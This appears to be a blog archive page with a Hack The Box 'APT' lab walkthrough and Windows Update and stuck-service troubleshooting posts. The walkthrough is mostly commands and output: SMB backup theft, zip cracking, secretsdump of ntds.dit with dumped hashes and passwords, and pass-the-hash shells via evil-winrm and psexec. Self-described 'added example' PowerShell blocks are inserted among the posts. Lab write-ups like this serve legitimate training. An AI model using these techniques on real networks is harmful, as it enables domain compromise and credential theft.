Month: December 2020
htb-apt-nl
I used https://github.com/puckiestyle/python/blob/master/IOXIDresolver.py
Reference used: The OXID Resolver [Part 1] – Remote enumeration of network interfaces without any authentication
┌─[root@parrot-virtual]─[/home/user/htb]
└──╼ #python3 IOXIDresolver.py -t 10.10.10.213
[*] Retrieving network interface of 10.10.10.213
Address: apt
Address: 10.10.10.213
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::8d29:507a:2edb:a06e
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i dead:beef::b885:d62a:d679:573f -u roastsvc -p '!!!watermelon245'
$nmap -6 -sV dead:beef::b885:d62a:d679:573f
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-04 14:52 GMT
Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 9.09% done; ETC: 14:54 (0:01:00 remaining)
Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 90.91% done; ETC: 14:55 (0:00:11 remaining)
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.026s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
80/tcp   open  http         Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-12-04 14:53:07Z)
135/tcp  open  msrpc        Microsoft Windows RPC
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=12/4%Time=5FCA4D54%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.32 seconds
evil-winrm -i dead:beef::b885:d62a:d679:573f -u henry.vinson_adm -p 'G1#Ny5@2dvht'
1) get the IPv6 address
2) connect to it with smbclient and get backup.zip
3) crack the zip with rockyou.txt
4) run secretsdump.py (impacket) on ntds.dit
5) run kerbrute to find valid users
6) make a list of hashes
7) use crackmapexec -H hashes.txt
┌─[✗]─[puck@parrot-lt]─[~/htb/apt]
└──╼ $impacket-smbclient htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# ls
[-] No share selected
# shares
backup
IPC$
NETLOGON
SYSVOL
# use backup
# ls
drw-rw-rw- 0 Thu Sep 24 08:31:03 2020 .
drw-rw-rw- 0 Thu Sep 24 08:31:03 2020 ..
-rw-rw-rw- 10650961 Thu Sep 24 08:31:03 2020 backup.zip
# get backup.zip
┌─[puck@parrot-lt]─[~/htb/apt]
└──╼ $impacket-lookupsid htb.local/henry.vinson_adm:G1#Ny5@2dvht@htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Brute forcing SIDs at htb.local
[*] StringBinding ncacn_np:htb.local[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2993095098-2100462451-206186470
498: HTB\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: HTB\Administrator (SidTypeUser)
501: HTB\Guest (SidTypeUser)
502: HTB\krbtgt (SidTypeUser)
503: HTB\DefaultAccount (SidTypeUser)
512: HTB\Domain Admins (SidTypeGroup)
513: HTB\Domain Users (SidTypeGroup)
514: HTB\Domain Guests (SidTypeGroup)
515: HTB\Domain Computers (SidTypeGroup)
516: HTB\Domain Controllers (SidTypeGroup)
517: HTB\Cert Publishers (SidTypeAlias)
518: HTB\Schema Admins (SidTypeGroup)
519: HTB\Enterprise Admins (SidTypeGroup)
520: HTB\Group Policy Creator Owners (SidTypeGroup)
521: HTB\Read-only Domain Controllers (SidTypeGroup)
522: HTB\Cloneable Domain Controllers (SidTypeGroup)
525: HTB\Protected Users (SidTypeGroup)
526: HTB\Key Admins (SidTypeGroup)
527: HTB\Enterprise Key Admins (SidTypeGroup)
553: HTB\RAS and IAS Servers (SidTypeAlias)
571: HTB\Allowed RODC Password Replication Group (SidTypeAlias)
572: HTB\Denied RODC Password Replication Group (SidTypeAlias)
1001: HTB\APT$ (SidTypeUser)
1102: HTB\DnsAdmins (SidTypeAlias)
1103: HTB\DnsUpdateProxy (SidTypeGroup)
1104: HTB\apt-Admins (SidTypeAlias)
1105: HTB\henry.vinson (SidTypeUser)
1106: HTB\henry.vinson_adm (SidTypeUser)
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $zip2john backup.zip > encrypted.hash$
backup.zip/Active Directory/ is not encrypted!
ver 2.0 backup.zip/Active Directory/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/Active Directory/ntds.dit PKZIP Encr: cmplen=8483543, decmplen=50331648, crc=ACD0B2FB
ver 2.0 backup.zip/Active Directory/ntds.jfm PKZIP Encr: cmplen=342, decmplen=16384, crc=2A393785
ver 2.0 backup.zip/registry/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/registry/SECURITY PKZIP Encr: cmplen=8522, decmplen=262144, crc=9BEBC2C3
ver 2.0 backup.zip/registry/SYSTEM PKZIP Encr: cmplen=2157644, decmplen=12582912, crc=65D9BFCD
NOTE: It is assumed that all files in each archive have the same password. If that is not the case, the hash may be uncrackable. To avoid this, use option -o to pick a file at a time.
┌─[✗]─[user@parrot-virtual]─[~/htb/apt]
└──╼ $john encrypted.hash\$ --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch (backup.zip)
1g 0:00:00:00 DONE (2021-01-26 09:37) 20.00g/s 163840p/s 163840c/s 163840C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211:::
--snip--
prue.olson:aes256-cts-hmac-sha1-96:cd0d76863148d8ad87c40bd1903a6af2295db46ce3e9494d1f8b95de99b91a64
prue.olson:aes128-cts-hmac-sha1-96:d817cf2341be47674e6d0dccab1237b0
prue.olson:des-cbc-md5:2c5dba54314c20ba
[*] ClearText password from ntds.dit
APT$:CLEARTEXT:4[%fo'zG`&BhR3cP[)U2NVS\LEYO/&^)<9xj6%#9\\?uJ4YPb`DRK" IES2fXK"f,X(Ql*fg0RfRq=!,BeAVFt^EVRR-L)VaTjv/QG9=o;G@g>Vab-UYc Yd
[*] Cleaning up...
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL > result.txt
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $cat result.txt | grep henry
henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::
livy.henry:3900:aad3b435b51404eeaad3b435b51404ee:5c0f4f9540cad94bb2554c8684d9ea66:::
henry.vinson:aes256-cts-hmac-sha1-96:4c0ec4cffc953266ed72d9b565da62115655d2f402416af92e4e76d121663e2f
henry.vinson:aes128-cts-hmac-sha1-96:da63c28166768a2829f00d30ec9fbddd
henry.vinson:des-cbc-md5:80a2c83213b3dfd6
livy.henry:aes256-cts-hmac-sha1-96:8f0397da6b26addc0536c294a788b919dd980afb738e3a9c233afcfc90fba5b0
livy.henry:aes128-cts-hmac-sha1-96:b719dae2156cd496995db190411d319e
livy.henry:des-cbc-md5:1043cb0bce31c49e
┌─[user@parrot-virtual]─[~/htb/apt]
evil-winrm -i dead:beef::b885:d62a:d679:573f -u Administrator -H c370bddf384a691d811ff3495e8a72e2
Thus:
1st: add the IPv6 address to /etc/hosts: dead:beef::b885:d62a:d679:573f apt.htb htb.local
2nd
┌─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $sudo ruby evil-winrm.rb -i htb.local -u henry.vinson_adm
Enter Password:G1#Ny5@2dvh
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> ls
    Directory: C:\Users\henry.vinson_adm\Documents
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/25/2021  11:53 AM          12674 Powerless.bat
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> download Powerless.bat
Info: Downloading C:\Users\henry.vinson_adm\Documents\Powerless.bat to Powerless.bat
Info: Download successful!
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>
3rd
┌─[✗]─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $ruby evil-winrm.rb -i dead:beef::b885:d62a:d679:573f -u Administrator -H c370bddf384a691d811ff3495e8a72e2
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman"
Error: Exiting with code 1
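The "bad URI" error above is the generic RFC 3986 rule that an IPv6 literal inside a URL must be wrapped in square brackets, otherwise the parser cannot tell the address's colons from the host:port separator; a hostname in /etc/hosts sidesteps it. As an added example (not code from the writeup or from evil-winrm), this PowerShell helper builds a WinRM endpoint URL that handles both cases; the function name and parameters are assumptions.

```powershell
# Added example, not part of the original post or of evil-winrm.
# Builds the <scheme>://<host>:<port>/wsman endpoint a WinRM client needs,
# bracketing IPv6 literals as RFC 3986 requires. Assumed names: the function
# and its parameters; $Port defaults to WinRM's HTTP listener port 5985.
function New-WsmanEndpointUri {
    param(
        [Parameter(Mandatory)][string]$TargetHost,
        [int]$Port = 5985,
        [switch]$UseSsl
    )
    $scheme   = if ($UseSsl) { 'https' } else { 'http' }
    $hostPart = $TargetHost
    $ip       = $null

    # An IPv6 literal contains ':' and must be wrapped in [] so the URI parser
    # does not read everything after the first ':' as a (bogus) port number.
    if ([System.Net.IPAddress]::TryParse($TargetHost, [ref]$ip) -and
        $ip.AddressFamily -eq [System.Net.Sockets.AddressFamily]::InterNetworkV6 -and
        -not $TargetHost.StartsWith('[')) {
        $hostPart = "[$TargetHost]"
    }

    $text = '{0}://{1}:{2}/wsman' -f $scheme, $hostPart, $Port
    $uri  = $null
    # Validate with the .NET parser instead of trusting string concatenation.
    if (-not [System.Uri]::TryCreate($text, [System.UriKind]::Absolute, [ref]$uri)) {
        throw "Could not build a valid WinRM endpoint from '$TargetHost'"
    }
    return $uri
}

# Constructed usage; the address and hostname are the ones from the writeup.
# The bracketed result is the form that a URI parser accepts, the hostname
# form is what the /etc/hosts workaround produces.
New-WsmanEndpointUri -TargetHost 'dead:beef::b885:d62a:d679:573f'
New-WsmanEndpointUri -TargetHost 'htb.local'
```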
┌─[✗]─[user@parrot-virtual]─[/opt/evil-winrm]
└──╼ $ruby evil-winrm.rb -i htb.local -u Administrator -H c370bddf384a691d811ff3495e8a72e2
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
henry.vinson             henry.vinson_adm         krbtgt
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> dir
    Directory: C:\Users\Administrator
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/24/2020   9:12 AM                Contacts
d-r---       10/23/2020  10:59 AM                Desktop
d-r---        9/24/2020   9:12 AM                Documents
d-r---        9/24/2020   9:12 AM                Downloads
d-r---        9/24/2020   9:12 AM                Favorites
d-r---        9/24/2020   9:12 AM                Links
d-r---        9/24/2020   9:12 AM                Music
d-r---        9/24/2020   9:12 AM                Pictures
d-r---        9/24/2020   9:12 AM                Saved Games
d-r---        9/24/2020   9:12 AM                Searches
d-r---        9/24/2020   9:12 AM                Videos
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
    Directory: C:\Users\Administrator\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        12/4/2020   1:22 PM             34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
0ca97e04be5679529b87cc2a2de98782
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd ..
*Evil-WinRM* PS C:\Users\> dir
    Directory: C:\Users
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/24/2020   7:54 AM                Administrator
d-----        9/24/2020   8:39 AM                henry.vinson
d-----        9/24/2020   8:40 AM                henry.vinson_adm
d-r---       11/21/2016   2:39 AM                Public
*Evil-WinRM* PS C:\Users> cd henry.vinson_adm
*Evil-WinRM* PS C:\Users\henry.vinson_adm> cd desktop
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> type user.txt
e1e73b8410cf060794a86e7f6a753f83
*Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop>
E:\PENTEST>psexec_windows.exe -hashes c370bddf384a691d811ff3495e8a72e2:c370bddf384a691d811ff3495e8a72e2 administrator@htb.local
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on apt.htb.....
[-] share 'backup' is not writable.
[*] Found writable share NETLOGON
[*] Uploading file RJdJAMfb.exe
[*] Opening SVCManager on apt.htb.....
[*] Creating service kOFV on apt.htb.....
[*] Starting service kOFV.....
windows-update-clear-update-cache
I recently had a Windows 2016 server that could not install automatic updates. It always hung at some percentage and would never finish. The next step was to try to install an update (.msu file) manually. But this always hung forever at "Copying packages to the update cache".
Here is what helped me:
Start a cmd box as Administrator
Run the following commands:
net stop wuauserv
net stop cryptSvc
net stop bits
net stop msiserver
del /f /q "%ALLUSERSPROFILE%\Application Data\Microsoft\Network\Downloader\qmgr*.dat"
del /f /s /q %SystemRoot%\SoftwareDistribution\*.*
del /f /s /q %SystemRoot%\system32\catroot2\*.*
del /f /q %SystemRoot%\WindowsUpdate.log
net start wuauserv
net start cryptSvc
net start bits
net start msiserver
This will clear the Windows Update cache and the automatic updates should work again.
How to Force Kill a Stuck Windows Service Using TaskKill?
The easiest way to stop a stuck service is to use the built-in taskkill command-line tool. First of all, you need to find the PID (process identifier) of the service. As an example, let's take the Windows Update service. Its system name is wuauserv (you can check the name in the service properties in the services.msc console).
Run this command in the elevated command prompt (it is important, or access denied error will appear):
sc queryex wuauserv
In our case, the PID of the wuauserv service is 9168.
To force kill a stuck process with the PID 9168, run the command:
taskkill /PID 9168 /F
SUCCESS: The process with PID 9168 has been terminated.
This command will forcibly terminate the service process. Now you can start the service with the sc start servicename command or through the service management console.
You can stop a hung service more elegantly without manually checking the PID of the service process. The taskkill tool has the /FI option, which allows you to use a filter to select the necessary services or processes. You can kill a specific service with the command:
taskkill /F /FI "SERVICES eq wuauserv"
Or you can skip the service name altogether and kill all services in a hung state with the command:
taskkill /F /FI "status eq not responding"
After that, the service that is stuck in the Stopping status should stop.
You can also use the taskkill utility to force stop hung services on a remote computer:
taskkill /S mun-fs01 /F /FI "SERVICES eq wuauserv"
Force Stop a Stuck Windows Service with PowerShell
You can also use PowerShell to force the service to stop. Using the following command, you can get a list of services in the Stopping state:
Get-WmiObject -Class win32_service | Where-Object {$_.state -eq 'stop pending'}
Or in the Starting state:
Get-WmiObject -Class win32_service | Where-Object {$_.state -eq 'start pending'}
The Stop-Process cmdlet allows terminating the processes of all found services. The following PowerShell script will terminate all stuck service processes on Windows:
$Services = Get-WmiObject -Class win32_service -Filter "state = 'stop pending'"
if ($Services) {
foreach ($service in $Services) {
try {
Stop-Process -Id $service.processid -Force -PassThru -ErrorAction Stop
}
catch {
Write-Warning -Message "Error. Error details: $_.Exception.Message"
}
}
}
else {
Write-Output "No services with 'Stopping' status"
}
You must use the Get-CimInstance cmdlet instead of Get-WmiObject in the new PowerShell Core 6.x/7.x. Replace the first command of the script with:
$Services = Get-CimInstance -Class win32_service | where-Object state -eq 'stop pending'
Method 2: Reset Windows update components.
Resetting Windows Update Components will fix corrupt Windows Update Components and help you to install the Windows Updates. Please follow the below steps to reset the Windows Updates Components manually:
- Press Windows Key + X on the keyboard and then select “Command Prompt (Admin)” from the menu.
- Stop the BITS, Cryptographic, MSI Installer and the Windows Update Services. To do this, type the following commands at a command prompt. Press the “ENTER” key after you type each command.
- net stop wuauserv
- net stop cryptSvc
- net stop bits
- net stop msiserver
- Now rename the SoftwareDistribution and Catroot2 folder. You can do this by typing the following commands in the Command Prompt. Press the “ENTER” key after you type each command.
- ren C:\Windows\SoftwareDistribution SoftwareDistribution.old
- ren C:\Windows\System32\catroot2 Catroot2.old
- Now, let’s restart the BITS, Cryptographic, MSI Installer and the Windows Update Services. Type the following commands in the Command Prompt for this. Press the ENTER key after you type each command.
- net start wuauserv
- net start cryptSvc
- net start bits
- net start msiserver
- Type Exit in the Command Prompt to close it.
Now you may try running the Windows Updates and check if the above steps resolve the issue.
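The cache-clearing post and the reset steps above both stop the same four services, clear or rename the same two folders, and start the services again, while the taskkill post covers the case where one of those services hangs in the Stopping state. This PowerShell script is an added example (not code from any of the posts) that does the whole procedure in one place: it stops each service with a timeout, force-kills the host process only if the service is still StopPending afterwards, and renames the folders as Method 2 does. It assumes an elevated session; the script name, the -Purge switch and -StopTimeoutSec are assumptions, not documented parameters.

```powershell
# Added example, not from the original posts. Run from an elevated PowerShell.
# Assumed parameters: -Purge deletes the folders instead of renaming them
# (the cache-clearing post's "del" variant); -StopTimeoutSec is the wait
# before a StopPending service gets its process killed, as in the taskkill post.
[CmdletBinding(SupportsShouldProcess)]
param([switch]$Purge, [int]$StopTimeoutSec = 30)

$services = 'wuauserv', 'cryptSvc', 'bits', 'msiserver'
$folders  = "$env:SystemRoot\SoftwareDistribution", "$env:SystemRoot\System32\catroot2"

function Stop-ServiceOrKill {
    param([string]$Name, [int]$TimeoutSec)
    $svc = Get-Service -Name $Name -ErrorAction SilentlyContinue
    if (-not $svc) { Write-Warning "Service $Name not found"; return }
    if ($svc.Status -eq 'Stopped') { return }
    Stop-Service -Name $Name -Force -ErrorAction SilentlyContinue
    try {
        $svc.WaitForStatus('Stopped', [TimeSpan]::FromSeconds($TimeoutSec))
    } catch [System.ServiceProcess.TimeoutException] {
        # Still not stopped after the timeout: kill the hosting process, the
        # equivalent of taskkill /F /FI "SERVICES eq <name>". Caveat: if the
        # service shares an svchost with others, those go down with it.
        $procId = (Get-CimInstance Win32_Service -Filter "Name = '$Name'").ProcessId
        if ($procId) {
            Write-Warning "$Name still $((Get-Service $Name).Status); killing PID $procId"
            Stop-Process -Id $procId -Force -ErrorAction Stop
        }
    }
}

foreach ($s in $services) { Stop-ServiceOrKill -Name $s -TimeoutSec $StopTimeoutSec }

foreach ($f in $folders) {
    if (-not (Test-Path $f)) { continue }
    if ($Purge) {
        if ($PSCmdlet.ShouldProcess($f, 'Remove')) { Remove-Item $f -Recurse -Force }
    } else {
        # Rename to <folder>.old as in Method 2; drop a leftover .old from a previous run.
        $backup = "$f.old"
        if (Test-Path $backup) { Remove-Item $backup -Recurse -Force }
        if ($PSCmdlet.ShouldProcess($f, "Rename to $backup")) {
            Rename-Item -Path $f -NewName (Split-Path $backup -Leaf)
        }
    }
}

# Restart in the posts' order; wuauserv and cryptSvc recreate the folders on start.
foreach ($s in $services) { Start-Service -Name $s -ErrorAction Continue }
Get-Service -Name $services | Select-Object Name, Status
```

Running it with -WhatIf shows the rename or remove actions without performing them, which is worth doing once on a production server before the real run.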
For reference: https://support.microsoft.com/en-us/kb/971058
Disclaimer: Important: this section, method, or task contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly.